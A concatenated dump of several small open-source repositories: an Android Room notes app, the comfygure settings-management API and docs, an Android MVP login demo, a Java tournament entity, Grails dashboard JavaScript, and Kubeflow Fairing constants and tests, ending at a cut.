import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.os.Bundle;
import android.view.Menu;
import android.view.MenuInflater;
import android.view.MenuItem;
import android.widget.EditText;
import android.widget.NumberPicker;
import android.widget.Toast;
public class AddEditNoteActivity extends AppCompatActivity {
public static final String EXTRA_ID = BuildConfig.APPLICATION_ID.concat("EXTRA_ID");
public static final String EXTRA_TITLE = BuildConfig.APPLICATION_ID.concat("EXTRA_TITLE");
public static final String EXTRA_DESC = BuildConfig.APPLICATION_ID.concat("EXTRA_DESC");
public static final String EXTRA_PRIORITY = BuildConfig.APPLICATION_ID.concat("EXTRA_PRIORITY");
private ActionBar actionBar;
private EditText etTitle;
private EditText etDesc;
private NumberPicker numberPickerPriority;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_add_note);
initialize();
Intent intent = getIntent();
if (intent.hasExtra(EXTRA_ID)) {
setTitle("Edit Note");
} else {
setTitle("Add Note");
}
}
private void saveNote() {
String title = etTitle.getText().toString();
String desc = etDesc.getText().toString();
int priority = numberPickerPriority.getValue();
if (title.trim().isEmpty() || desc.trim().isEmpty()) {
Toast.makeText(this, "Please insert Title and Description", Toast.LENGTH_SHORT).show();
return;
}
Intent data = new Intent();
data.putExtra(EXTRA_TITLE, title);
data.putExtra(EXTRA_DESC, desc);
data.putExtra(EXTRA_PRIORITY, priority);
int id = getIntent().getIntExtra(EXTRA_ID, -1);
if (id != -1) {
data.putExtra(EXTRA_ID, id);
}
setResult(RESULT_OK, data); //Indicates that activity's work was success
finish();
}
private void initialize() {
acquireIds();
numberPickerPriority.setMinValue(1);
numberPickerPriority.setMaxValue(10);
actionBar.setHomeAsUpIndicator(R.drawable.ic_close);
Intent intent = getIntent();
if (intent.hasExtra(EXTRA_ID)) {
setTitle(R.string.edit_note_title);
etTitle.setText(intent.getStringExtra(EXTRA_TITLE));
etDesc.setText(intent.getStringExtra(EXTRA_DESC));
numberPickerPriority.setValue(intent.getIntExtra(EXTRA_PRIORITY, 1));
} else {
setTitle(R.string.add_note_title);
}
}
private void acquireIds() {
actionBar = getSupportActionBar();
etTitle = findViewById(R.id.et_title);
etDesc = findViewById(R.id.et_desc);
numberPickerPriority = findViewById(R.id.number_picker_priority);
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
MenuInflater menuInflater = getMenuInflater();
menuInflater.inflate(R.menu.add_note_menu, menu);
return true;
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
switch (item.getItemId()) {
case R.id.save_note: saveNote();
return true;
}
return super.onOptionsItemSelected(item);
}
}
<file_sep>/README.md
# Simple-Notes
A simple Notes Android app for trying ROOM database and MVVM pattern.
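Below is a minimal sketch of the Room DAO this app builds on. The `NoteDao` name and the `insert`/`update`/`delete`/`deleteAllNotes`/`getAllNotes` methods come from the calls in `NoteRepository`; the annotations, the table name, and the ordering query are assumptions for illustration.

```java
import androidx.lifecycle.LiveData;
import androidx.room.Dao;
import androidx.room.Delete;
import androidx.room.Insert;
import androidx.room.Query;
import androidx.room.Update;
import java.util.List;

@Dao
public interface NoteDao {
    @Insert
    void insert(Note note);

    @Update
    void update(Note note);

    @Delete
    void delete(Note note);

    // "note_table" is an assumed table name; adjust to the actual @Entity mapping
    @Query("DELETE FROM note_table")
    void deleteAllNotes();

    @Query("SELECT * FROM note_table ORDER BY priority DESC")
    LiveData<List<Note>> getAllNotes();
}
```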
<file_sep>/app/src/main/java/com/softinit/notes/NoteRepository.java
package com.softinit.notes;
import android.app.Application;
import android.os.AsyncTask;
import java.util.List;
import androidx.lifecycle.LiveData;
public class NoteRepository {
private NoteDao noteDao;
private LiveData<List<Note>> allNotes;
public NoteRepository(Application application) {
NoteDatabase noteDatabase = NoteDatabase.getInstance(application);
noteDao = noteDatabase.noteDao();
allNotes = noteDao.getAllNotes();
}
public void insert(Note note) {
new NoteOperationAsyncTask(noteDao, NoteOperationAsyncTask.INSERT).execute(note);
}
public void update(Note note) {
new NoteOperationAsyncTask(noteDao, NoteOperationAsyncTask.UPDATE).execute(note);
}
public void delete(Note note) {
new NoteOperationAsyncTask(noteDao, NoteOperationAsyncTask.DELETE).execute(note);
}
public void deleteAllNotes() {
new NoteOperationAsyncTask(noteDao, NoteOperationAsyncTask.DELETE_ALL).execute((Note)null);
}
public LiveData<List<Note>> getAllNotes() {
return allNotes;
}
private static class NoteOperationAsyncTask extends AsyncTask<Note, Void, Void> {
public static final int INSERT=2;
public static final int UPDATE=4;
public static final int DELETE=8;
public static final int DELETE_ALL=16;
private NoteDao noteDao;
private int type;
public NoteOperationAsyncTask(NoteDao noteDao, int type) {
this.noteDao = noteDao;
this.type = type;
}
@Override
protected Void doInBackground(Note... notes) {
switch (type) {
case INSERT:
noteDao.insert(notes[0]);
break;
case UPDATE:
noteDao.update(notes[0]);
break;
case DELETE:
noteDao.delete(notes[0]);
break;
case DELETE_ALL:
noteDao.deleteAllNotes();
break;
}
return null;
}
}
}
|
d6b49b844709db1a904297bfa738736cde8696bd
|
[
"Markdown",
"Java"
] | 3
|
Java
|
firefinchdev/Simple-Notes
|
6c9f1e873cf4348a220ae84723840564ea6165cf
|
137a97a040b7988ba2eddca8a54a76b4f364b17e
|
refs/heads/master
|
<repo_name>fossabot/comfygure<file_sep>/api/src/domain/environments/get.js
import environmentsQueries from '../../queries/environments';
export default async projectId => environmentsQueries.selectByProject(projectId);
<file_sep>/api/src/domain/environments/get.spec.js
import get from './get';
import environmentsQueries from '../../queries/environments';
jest.mock('../../queries/environments');
describe('domain/environments/get', () => {
it('should call the query with the right arguments', async () => {
const projectId = 1;
await get(projectId);
expect(environmentsQueries.selectByProject).toHaveBeenCalledWith(projectId);
});
});
<file_sep>/api/config/database.js
const config = require('config');
const databaseConfig = Object.assign({}, { driver: 'pg' }, config.db.client);
if (process.env.PGHOST) {
databaseConfig.host = process.env.PGHOST;
}
if (process.env.PGPORT) {
databaseConfig.port = process.env.PGPORT;
}
if (process.env.PGDATABASE) {
databaseConfig.database = process.env.PGDATABASE;
}
if (process.env.PGUSER) {
databaseConfig.user = process.env.PGUSER;
}
if (process.env.PGPASSWORD) {
databaseConfig.password = <PASSWORD>;
}
// dev is the configuration by default, using config to change the conf based on NODE_ENV value
module.exports = { dev: databaseConfig };
<file_sep>/api/src/domain/validation.js
import environmentsQueries from '../queries/environments';
import projectsQueries from '../queries/projects';
import { NotFoundError } from './errors';
export const checkEnvironmentExistsOrThrow404 = async (projectId, environmentName) => {
const project = await projectsQueries.findOne(projectId);
if (!project) {
throw new NotFoundError({
message: `Unable to find project "${projectId}"`,
details: [
'Have you initialized a comfy project in this directory?',
'Type "comfy init" to do so.',
].join(' '),
});
}
const env = await environmentsQueries.findOne(projectId, environmentName);
if (!env) {
throw new NotFoundError({
message: `Unable to find environment "${environmentName}" for project "${projectId}".`,
details: 'Type "comfy env ls" to list available environments.',
});
}
};
<file_sep>/docs/AdvancedUsage.md
---
layout: default
title: "Advanced Usage"
---
## Host Your Own Comfy Server
Marmelab hosts the default comfygure server at `https://comfy.marmelab.com`. You can use it for free, for your tests, with no warranties of availability. We reserve the right to suspend usage in case of abuse.
In production, you'll probably want to host your own comfygure server. Fortunately, the comfygure server code is open-source and [available on GitHub](https://github.com/marmelab/comfygure).
Comfygure is designed to be deployed as a few [AWS Lambdas](https://aws.amazon.com/fr/lambda/) thanks to [the serverless framework](https://serverless.com/). As for the database, you have to provision and manage it yourself.
Once your server is configured, use the standard `comfy` client to initialize your project, and pass your server URL in the `--origin` option:
```bash
comfy init --origin https://my.custom.host
```
<file_sep>/api/makefile
SERVERLESS := node_modules/.bin/serverless
DATABASE ?= comfy
export PGUSER ?= postgres
export PGHOST ?= localhost
install:
npm i
install-db:
docker run --name comfy-db -p 5432:5432 -d postgres:9.6
sleep 5s
psql -c "CREATE DATABASE ${DATABASE}"
make migrate
migrate:
./node_modules/db-migrate/bin/db-migrate up --config ./config/database.js
start-db:
docker start comfy-db
stop-db:
docker stop comfy-db
connect-db:
psql comfy
run:
$(SERVERLESS) offline start --host=0.0.0.0 --port=3000
deploy:
NODE_ENV=production $(SERVERLESS) deploy --stage beta
undeploy:
NODE_ENV=production $(SERVERLESS) remove --stage beta
test:
NODE_ENV=test ./node_modules/.bin/jest
test-watch:
NODE_ENV=test ./node_modules/.bin/jest --watch
<file_sep>/api/src/domain/configurations/add.js
import hash from 'object-hash';
import entriesQueries from '../../queries/entries';
import versionsQueries from '../../queries/versions';
import configurationsQueries from '../../queries/configurations';
import environmentsQueries from '../../queries/environments';
import { ENVVARS } from '../common/formats';
import { get as getVersion } from './version';
import { add as addTag, get as getTag, update as updateTag } from './tag';
import { checkEnvironmentExistsOrThrow404 } from '../validation';
export default async (
projectId,
environmentName,
configurationName = 'default',
tagName = null,
entries = {},
) => {
await checkEnvironmentExistsOrThrow404(projectId, environmentName);
let configuration = await configurationsQueries.findOne(
projectId,
environmentName,
configurationName,
);
let configurationNewlyCreated = false;
if (!configuration) {
const environment = await environmentsQueries.findOne(projectId, environmentName);
// TODO: If no environment found, return a usable error
configuration = await configurationsQueries.insertOne({
environment_id: environment.id,
name: configurationName,
default_format: ENVVARS,
});
configurationNewlyCreated = true;
}
const currentVersion = await getVersion(projectId, environmentName, configurationName, tagName);
const versionHash = hash({
previous: currentVersion ? currentVersion.hash : null,
entries,
});
// TODO: If the version hash already exist in DB
// return a 304 to warn that the version already exists
const version = await versionsQueries.insertOne({
hash: versionHash,
configuration_id: configuration.id,
previous: currentVersion ? currentVersion.hash : null,
});
const newTagInfos = {
versionId: version.id,
configurationId: configuration.id,
};
if (configurationNewlyCreated) {
await Promise.all([
{ ...newTagInfos, name: 'stable' },
{ ...newTagInfos, name: 'next' },
].map(tag => addTag(tag.configurationId, tag.versionId, tag.name)));
}
// Create or update the specified tag
if (tagName) {
const tag = await getTag(configuration.id, tagName);
if (tag) {
await updateTag(tag, { version_id: version.id });
} else {
await addTag(newTagInfos.configurationId, newTagInfos.versionId, tagName);
}
}
await Promise.all(Object.keys(entries).map(key => entriesQueries.insertOne({
key,
value: entries[key],
version_id: version.id,
})));
const { id, name, default_format: defaultFormat } = configuration;
return {
id,
name,
defaultFormat,
};
};
<file_sep>/docs/index.md
---
layout: default
title: "Documentation"
---
# Comfygure
Store and deploy settings across development, test, and production environments, using an encrypted key-value store.
<div style="text-align: center" markdown="1">
<i class="octicon octicon-mark-github"></i> [Source](https://github.com/marmelab/comfygure) -
<i class="octicon octicon-megaphone"></i> [Releases](https://github.com/marmelab/comfygure/releases) -
<i class="octicon octicon-comment-discussion"></i> [StackOverflow](https://stackoverflow.com/questions/tagged/comfy/)
</div>
Comfygure assumes that you deploy artefacts that require settings to run in various environments. Comfygure solves the problem of managing, storing, and deploying these settings.
<script type="text/javascript" src="https://asciinema.org/a/137703.js" id="asciicast-137703" async></script>
Unlike many other [Secret Management Tools](https://gist.github.com/maxvt/bb49a6c7243163b8120625fc8ae3f3cd), comfygure doesn't try to pack too many features into one tool. Comfygure tries to do one thing (settings deployment), and do it well.
## Features
* Simple CLI tool
* Web GUI
* Multi-environment (dev, test, staging, production, etc.)
* End-to-end encryption using AES-256
* Read/Write permissions
* Input and output in multiple formats (JSON, YAML, environment variables)
* Versioning (git-like)
* Easy to host
## Command Line Installation
On every server that needs access to the settings of an app, install the `comfy` CLI using `npm`:
```bash
npm install -g comfygure
comfy help
```
## Usage
Initialize comfygure in a project directory with `comfy init`:
```bash
> cd myproject
> comfy init
Initializing project configuration...
Project created on comfy server https://comfy.marmelab.com
Configuration saved locally in .comfy/config
comfy project successfully created
```
This creates a unique key to access the settings for `myproject`, and stores the key in `.comfy/config`. You can copy this file to share the credentials with co-workers or other computers.
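For example, to reuse the same credentials on another machine (hostname and destination path below are placeholders):

```bash
scp -r .comfy user@other-machine:~/myproject/
```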
**Tip**: By default, the `comfy` command stores encrypted settings in the `comfy.marmelab.com` server. To host your own comfy server, see [the related documentation](./AdvancedUsage.html#host-your-own-comfy-server).
Import an existing settings file to comfygure using `comfy setall`:
```bash
> echo '{"login": "admin", "password": "<PASSWORD>"}' > config.json
> comfy setall development config.json
Great! Your configuration was successfully saved.
```
From any computer sharing the same credentials, grab these settings using `comfy get`:
```bash
> comfy get development
{"login": "admin", "password": "<PASSWORD>"}
> comfy get development --envvars
export LOGIN='admin';
export PASSWORD='<PASSWORD>';
```
To turn settings grabbed from comfygure into environment variables, use the following:
```bash
> comfy get development --envvars | source /dev/stdin
> echo $LOGIN
admin
```
See the [documentation](https://marmelab.com/comfygure/) to know more about how it works and the remote usage.
## License
Comfygure is licensed under the [MIT License](https://github.com/marmelab/comfygure/blob/master/LICENSE), sponsored and supported by [marmelab](http://marmelab.com).
|
02d7da4a16b86df3a71b427cf65d784a67ae327b
|
[
"JavaScript",
"Makefile",
"Markdown"
] | 8
|
JavaScript
|
fossabot/comfygure
|
97c81893d4d36a9dce6469e94701322147568326
|
14cabe25c5858568b5c276c44a7aa8c89e961e57
|
refs/heads/master
|
<repo_name>EmilGabriel81/MVPDemo<file_sep>/app/src/main/java/com/unn/mvpdemo/Presenter.java
package com.unn.mvpdemo;
import com.unn.mvpdemo.Contract.IView;
public class Presenter implements Contract.IPresenter {
IView view;
public Presenter(IView view) {
this.view = view;
}
@Override
public void doLogin(String email, String password) {
if(email.equalsIgnoreCase("Emil")&&password.equalsIgnoreCase("123")){
view.onSuccess("Welcome");
}else{
view.onError("Unsuccessful attempt!");
}
}
}
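// The Contract type is not included in this dump. A sketch inferred from the
// calls above and in MainActivity (method names come from usage; the exact file
// layout is an assumption):
//
// public interface Contract {
//     interface IView {
//         void onSuccess(String message);
//         void onError(String message);
//     }
//     interface IPresenter {
//         void doLogin(String email, String password);
//     }
// }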
<file_sep>/app/src/main/java/com/unn/mvpdemo/MainActivity.java
package com.unn.mvpdemo;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;
public class MainActivity extends AppCompatActivity implements Contract.IView{
private static final String TAG = "MainActivity";
EditText email_txt, password_txt;
Button login_btn;
Contract.IPresenter presenter;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
email_txt = findViewById(R.id.email);
password_txt = findViewById(R.id.password);
login_btn = findViewById(R.id.btn_login);
presenter = new Presenter(this);
login_btn.setOnClickListener((View v) -> {
String email = email_txt.getText().toString();
String password = password_txt.getText().toString();
performLogin(email, password);
});
}
private void performLogin(String email, String password) {
presenter.doLogin(email,password);
}
@Override
public void onSuccess(String message) {
//Toast toast = Toast.makeText(getApplicationContext(), message, Toast.LENGTH_LONG).show();
Log.v(TAG,message);
Intent intent = new Intent(this,WelcomeActivity.class);
String name = email_txt.getText().toString();
intent.putExtra("Extra_message", name);
startActivity(intent);
}
@Override
public void onError(String message) {
Log.v(TAG,message);
Intent intent = new Intent(this,DeniedActivity.class);
startActivity(intent);
}
}
|
8d04331bc7ac134aef74f4d80ea98539b098e91f
|
[
"Java"
] | 2
|
Java
|
EmilGabriel81/MVPDemo
|
107cfde872b00974a10bb8e6b401679824c85e54
|
6449363d03b42eb423022758c530973854bd34f1
|
refs/heads/master
|
<repo_name>leandrobaena/tournament_java<file_sep>/database.properties
url=jdbc:mysql://localhost:3306/tournament
user=root
password=<PASSWORD>
<file_sep>/README.md
# tournament_java
Management of football championships in Java and MySQL
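A minimal sketch of opening a connection with the settings from `database.properties` (the file and its `url`/`user`/`password` keys come from this repository; everything else is illustrative, and exception handling is omitted):

```java
import java.io.FileInputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.util.Properties;

// Load the JDBC settings and open a connection to the tournament database
Properties props = new Properties();
try (FileInputStream in = new FileInputStream("database.properties")) {
    props.load(in);
}
try (Connection conn = DriverManager.getConnection(
        props.getProperty("url"),
        props.getProperty("user"),
        props.getProperty("password"))) {
    // ... run queries against the tournament schema
}
```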
<file_sep>/src/entities/Championship.java
package entities;
/**
* Championship or competition
*
* @author <NAME>
*/
public class Championship {
//<editor-fold defaultstate="collapsed" desc="Constructors">
/**
* Creates a new championship with identifier 0 and an empty name
*/
public Championship() {
this.idchampionship = 0;
this.name = "";
}
/**
* Creates a new championship with the given identifier and an empty name
*
* @param idchampionship Championship identifier
*/
public Championship(int idchampionship) {
this.idchampionship = idchampionship;
this.name = "";
}
//</editor-fold>
//<editor-fold defaultstate="collapsed" desc="Properties">
/**
* Gets the championship identifier
*
* @return Championship identifier
*/
public int getIdchampionship() {
return idchampionship;
}
/**
* Sets the championship identifier
*
* @param idchampionship New championship identifier
*/
public void setIdchampionship(int idchampionship) {
this.idchampionship = idchampionship;
}
/**
* Gets the championship name
*
* @return Championship name
*/
public String getName() {
return name;
}
/**
* Sets the championship name
*
* @param name New championship name
*/
public void setName(String name) {
this.name = name;
}
//</editor-fold>
//<editor-fold defaultstate="collapsed" desc="Attributes">
/**
* Championship identifier
*/
private int idchampionship;
/**
* Championship name
*/
private String name;
//</editor-fold>
}
|
cbe8696ecac1529834dc424ea85b2ae60452400a
|
[
"Markdown",
"Java",
"INI"
] | 3
|
INI
|
leandrobaena/tournament_java
|
6d6892008a325961e66a304204e83b6c56f50f3e
|
832d634615d8c2e8cb1813a97fc8eaad50b5d1a7
|
refs/heads/master
|
<repo_name>mainul35/sm-trading-erp<file_sep>/grails-app/assets/javascripts/fusion/fusion.requestManager.js
// Placeholder request lifecycle hooks; each currently just returns its argument
Fusion.requestManager = {
beforeSubmit: function (e = null) {
return e
},
onSubmit: function (e = null) {
return e
},
afterSubmit: function (e = null) {
return e
}
}<file_sep>/grails-app/assets/javascripts/fusion/fusion.core.js
var Fusion = {}
Fusion.authentication = {
clientDetails: btoa(
JSON.stringify([
{appName: 'bismillah-app'},
{clientId: 'MzMzZGViZWMtZTBhOS00NzhkLTg2MTEtZTcyY2U5ZmMxODQ0'},
{clientSecret: '<KEY>'},
{requestType: 'xhr'}
])
)
}<file_sep>/grails-app/i18n/constant.messages.properties
default=bismillah-app
login=Login
password=<PASSWORD>
email=Email
forgot.password=<PASSWORD>?<file_sep>/grails-app/assets/javascripts/dashboard.js
Fusion.requestManager.onSubmit(function () {
$(".btnSubmit").unbind().on('click', function (e) {
var form = $(this).closest("form")
var url = form.attr("to-url")
var data = JSON.stringify(form.serializeArray())
// base64 output may contain '+', '/' and '=', so URL-encode it before putting it in the query string
data = encodeURIComponent(btoa(data))
$.ajax({
type: 'POST',
url: url + "?key=" + data,
data: {},
dataType: "json",
headers: {
"client-details": Fusion.authentication.clientDetails
},
success: function (result) {
document.cookie = 'token='
document.cookie = `token=${result.responseData.token}`
if (result.responseData.statusCode == 200) {
location.href = '/management/dashboard'
}
}
});
})
}())<file_sep>/grails-app/assets/javascripts/application.js
//= require libs/jquery.min
//= require libs/bootstrap/js/popper.min
//= require libs/jquery.dataTables.min
//= require libs/bootstrap/js/bootstrap.min
//= require libs/moment-with-locales
//= require libs/jquery_ui/jquery-ui
//= require fusion/fusion.core
//= require fusion/fusion.requestManager
//= require auth
//= require dashboard
//= require_self
<file_sep>/settings.gradle
//include("plugins/security")<file_sep>/grails-app/assets/admin/js/sm-trading-erp/app.js
var APP = {}
APP.tabs = []
APP.addTab = function (tab) {
var li = document.createElement("li")
var a = document.createElement("a")
var t = document.createTextNode(tab.name)
// Keep the caller's tab object; redeclaring it here would wipe tab.name/tab.url
li.classList.add("nav-item")
li.appendChild(a)
a.appendChild(t)
a.href = tab.url ? tab.url : ""
a.classList.add("nav-link")
document.querySelector(".erp-nav").appendChild(li)
tab.li = li
tab.dropdownItems = []
this.tabs.push(tab)
}
APP.addDropdownItem = function (tabName, dropdownItem) {
var tab = APP.createDropdown(tabName)
var t = document.createTextNode(dropdownItem.name)
var childAnchor = document.createElement("a")
childAnchor.classList.add("dropdown-item")
childAnchor.appendChild(t)
childAnchor.href = dropdownItem.url ? dropdownItem.url : ""
tab.dropdownItems.push(childAnchor)
APP.replaceTab(tab)
}
APP.replaceTab = function (tab) {
APP.tabs.forEach(function (t, i) {
var parentAnchor = t.li.querySelector("a")
if (parentAnchor.textContent === tab.li.querySelector("a").textContent) {
APP.tabs[i] = tab
}
})
}
APP.removeTab = function (tabName) {
return this.tabs.filter(
function (value) {
// Tabs are wrapper objects, so compare against the anchor's text
return value.li.querySelector("a").textContent !== tabName;
})
}
APP.removeDropdownItem = function (dropdownItem) {
return this.tabs.filter(
function (value) {
return value !== dropdownItem;
})
}
APP.createDropdown = function (tabName) {
for (var count = 0; count < APP.tabs.length; count++) {
var tab = APP.tabs[count]
var parentAnchor = tab.li.querySelector("a")
if (parentAnchor.textContent === tabName) {
if (!parentAnchor.classList.contains("dropdown-toggle")) {
var div = document.createElement("div")
parentAnchor.classList.add("dropdown-toggle")
parentAnchor.dataset.toggle = "dropdown"
parentAnchor.id = "navbarDropdownMenuLink"
parentAnchor.setAttribute("aria-haspopup", "true");
parentAnchor.setAttribute("aria-expanded", "true");
tab.li.classList.add("dropdown")
div.classList.add("dropdown-menu")
div.classList.add("app-dropdown")
div.setAttribute("aria-labelledby", "navbarDropdownMenuLink");
div.setAttribute("x-placement", "bottom-start");
tab.li.appendChild(div)
}
return tab
}
}
}
APP.initializeTabs = function () {
APP.tabs.forEach(function (tab) {
document.querySelector(".erp-nav").appendChild(tab.li)
})
}
APP.initializeDropdownItems = function (tabName, dropdownItems) {
dropdownItems.forEach(function (dropdownItem) {
APP.addDropdownItem(tabName, dropdownItem)
})
APP.tabs.filter(function (tab) {
var parentAnchor = tab.li.querySelector("a")
if (parentAnchor.textContent === tabName) {
tab.dropdownItems.forEach(function (ddi) {
tab.li.querySelector(".dropdown-menu").appendChild(ddi)
})
}
})
}<file_sep>/grails-app/i18n/variable.messages.properties
x0.password={0} Password<file_sep>/gradle.properties
grailsVersion=3.3.8
gormVersion=6.1.10.BUILD-SNAPSHOT
gradleWrapperVersion=2.9
<file_sep>/grails-app/assets/admin/js/sm-trading-erp/tab.dashboard.js
// APP.addTab({name: "Dashboard", url:"/admin/dashboard"})
// APP.initializeTabs()
|
2c76df6a47d5c12566ca2fca843a542b5c533ab4
|
[
"JavaScript",
"INI",
"Gradle"
] | 10
|
JavaScript
|
mainul35/sm-trading-erp
|
16b41a694fd66b9e620643ad756e40738dbb088d
|
27ee4a51714368c963602f4b40e270359877d5e1
|
refs/heads/master
|
<repo_name>MaximkaStar/reflection<file_sep>/Reflection/Man.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Reflection
{
public class Man
{
public string Age { get; set; }
public string Name { get; set; }
public string Surname { get; set; }
public bool Busy { get; set; }
}
}
<file_sep>/Reflection/Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Reflection
{
class Program
{
static void Main(string[] args)
{
FirstTarget();
SecondTarget();
}
private static void FirstTarget()
{
Type style = typeof(Console);
var methods = style.GetMethods();
foreach(var method in methods)
{
Console.WriteLine("Name of method: {0}", method.Name);
Console.WriteLine("Parameters: ");
foreach(var parameter in method.GetParameters())
{
Console.WriteLine(parameter.ParameterType + " _ " + parameter.Name);
}
Console.WriteLine();
}
Console.ReadLine();
Console.Clear();
}
private static void SecondTarget()
{
Man man = new Man()
{
Name = "Aiden",
Surname = "Pearce",
Age = "29",
Busy = false
};
Type style = typeof(Man);
var internals = style.GetProperties();
for(int j = 0; j < internals.Length; j++)
{
switch(internals[j].Name)
{
case "Age":
int years = (int)internals[j].GetValue(man);
Console.WriteLine("Age: ", years);
break;
case "Surname":
string surname = (string)internals[j].GetValue(man);
Console.WriteLine("Surname: ", surname);
break;
case "Name":
string name = (string)internals[j].GetValue(man);
Console.WriteLine("Name: ", name);
break;
case "Busy":
bool busy = (bool)internals[j].GetValue(man);
Console.WriteLine("Busy(yes/no): ", busy);
break;
}
}
Console.ReadLine();
Console.Clear();
}
}
}
|
7261cc312a8b7d4cc95972bfa9a0cefb5229d5b2
|
[
"C#"
] | 2
|
C#
|
MaximkaStar/reflection
|
9b51bfac493863d26158353dcacc53758a53ef13
|
b8f049c912447ff3be38c43cb3dc886f4e669eb2
|
refs/heads/master
|
<repo_name>Bzour97/gallery-of-horns<file_sep>/README.md
# Class - 02:
## Number and name of feature: Feature #1: Display images
Estimate of time needed to complete: 60 Minutes
Start time: 1:00
Finish time: 2:15
Actual time needed to complete: One hour & 15 Minutes
----------------------------------------------------------------------------------
## Number and name of feature: Feature #2: Allow users to vote for their favorite beast
Estimate of time needed to complete: 45 Minutes
Start time: 2:15
Finish time: 3:05
Actual time needed to complete : 50 Minutes
----------------------------------------------------------------------------------
## Number and name of feature: Feature #3: Bootstrap
Estimate of time needed to complete: 60 Minutes
Start time: 3:30
Finish time: 4:45
Actual time needed to complete: One hour & 15 Minutes<file_sep>/src/components/HornedBeasts.js
import React from 'react';
import Card from 'react-bootstrap/Card'
import Row from 'react-bootstrap/Row'
import Col from 'react-bootstrap/Col'
class HornedBeasts extends React.Component {
constructor(props) {
super(props);
this.favorites = '💓';
this.state = { timeOfClick: 0 };
}
Click = (event) => {
event.preventDefault()
this.setState({ timeOfClick: this.state.timeOfClick + 1 });
this.props.handleDisplay();
this.props.filterBeast(this.props.image_url);
console.log(this.props.image_url)
}
render() {
return (
<div>
<Row xs={1} md={2} className = "test">
{Array.from({ length: 1 }).map((_, idx) => (
<Col key={idx}>
<Card>
<Card.Img variant="top" src={this.props.image_url} onClick={this.Click} width='250'/>
<Card.Body>
<Card.Title>{this.props.title}</Card.Title>
<Card.Text>
{this.props.description} {this.state.timeOfClick} {this.favorites}
</Card.Text>
</Card.Body>
</Card>
</Col>
))}
</Row>
</div>
)
}
}
export default HornedBeasts;
|
2260d4bd62691b892a98f21d2a5c092bc79b94fe
|
[
"Markdown",
"JavaScript"
] | 2
|
Markdown
|
Bzour97/gallery-of-horns
|
560a20a998f991c38828e8bb6dd5d7815aba2532
|
e219548064f0d7ad6efbb717e712cce3721175dc
|
refs/heads/master
|
<repo_name>wyw64962771/fairing<file_sep>/kubeflow/fairing/constants/constants.py
import os
TEMP_TAR_GZ_FILENAME = '/tmp/fairing.layer.tar.gz'
DEFAULT_IMAGE_NAME = 'fairing-job'
DEFAULT_BASE_IMAGE = 'gcr.io/kubeflow-images-public/fairing:dev'
DEFAULT_REGISTRY = 'index.docker.io'
DEFAULT_DEST_PREFIX = '/app/'
DEFAULT_CONTEXT_FILENAME = '/tmp/fairing.context.tar.gz'
DEFAULT_GENERATED_DOCKERFILE_FILENAME = '/tmp/Dockerfile'
GOOGLE_CREDS_ENV = 'GOOGLE_APPLICATION_CREDENTIALS'
GCP_SERVICE_ACCOUNT_NAME = 'default-editor'
GCP_CREDS_SECRET_NAME = 'user-gcp-sa'
AWS_CREDS_SECRET_NAME = 'aws-secret'
DOCKER_CREDS_SECRET_NAME = "docker-secret"
# See https://github.com/kubeflow/website/issues/1033 for documentation about these secrets.
AZURE_CREDS_SECRET_NAME = 'azcreds'
AZURE_ACR_CREDS_SECRET_NAME = 'acrcreds'
# The secret containing credentials to access a specific storage account is dynamically generated
# by using Azure credentials to get those storage credentials.
AZURE_STORAGE_CREDS_SECRET_NAME_PREFIX = 'storage-credentials-'
AZURE_FILES_SHARED_FOLDER = 'fairing-builds'
DEFAULT_USER_AGENT = 'kubeflow-fairing/{VERSION}'
# Job Constants
JOB_DEFAULT_NAME = 'fairing-job-'
JOB_DEPLOPYER_TYPE = 'job'
# Serving Constants
SERVING_DEPLOPYER_TYPE = 'serving'
#TFJob Constants
TF_JOB_VERSION = os.environ.get('TF_JOB_VERSION', 'v1beta2')
TF_JOB_GROUP = "kubeflow.org"
TF_JOB_KIND = "TFJob"
TF_JOB_PLURAL = "tfjobs"
TF_JOB_DEFAULT_NAME = 'fairing-tfjob-'
TF_JOB_DEPLOYER_TYPE = 'tfjob'
# KFServing constants
KFSERVING_GROUP = "serving.kubeflow.org"
KFSERVING_KIND = "KFService"
KFSERVING_PLURAL = "kfservices"
KFSERVING_VERSION = "v1alpha1"
KFSERVING_DEFAULT_NAME = 'fairing-kfserving-'
KFSERVING_DEPLOYER_TYPE = 'kfservice'
KFSERVING_CONTAINER_NAME = 'user-container'
# persistent volume claim constants
PVC_DEFAULT_MOUNT_PATH = '/mnt'
PVC_DEFAULT_VOLUME_NAME = 'fairing-volume-'
# Kaniko Constants
KANIKO_IMAGE = 'gcr.io/kaniko-project/executor:v0.7.0'
<file_sep>/tests/unit/config_test.py
"""Tests for Fairing configuration options."""
from kubeflow.fairing import config as config
from kubeflow.fairing.preprocessors.base import BasePreProcessor
from kubeflow.fairing.preprocessors.converted_notebook import ConvertNotebookPreprocessor
from kubeflow.fairing.builders.append.append import AppendBuilder
from kubeflow.fairing.builders.docker.docker import DockerBuilder
def test_set_preprocessor():
"""Assert that a custom preprocessor can be provided."""
config.reset()
config.set_preprocessor('notebook')
assert isinstance(config.get_preprocessor(), ConvertNotebookPreprocessor)
def test_get_preprocessor_with_default():
"""
Assert that getting the preprocessor without setting it returns the default
preprocessor.
"""
config.reset()
assert isinstance(config.get_preprocessor(), BasePreProcessor)
def test_set_builder_default():
"""
Assert that the default builder is set when no explicit argument is
provided.
"""
config.reset()
config.set_builder(push=False)
assert isinstance(config.get_builder(
config.get_preprocessor()), AppendBuilder)
def test_set_builder():
"""Assert that a custom builder can be provided."""
config.reset()
config.set_builder('docker', push=False)
assert isinstance(config.get_builder(
config.get_preprocessor()), DockerBuilder)
<file_sep>/tests/integration/common/test_kubeflow_training.py
import sys
import time
import uuid
from kubernetes import client
from kubeflow import fairing
from kubeflow.fairing.builders.cluster import gcs_context
from kubeflow.fairing.constants import constants
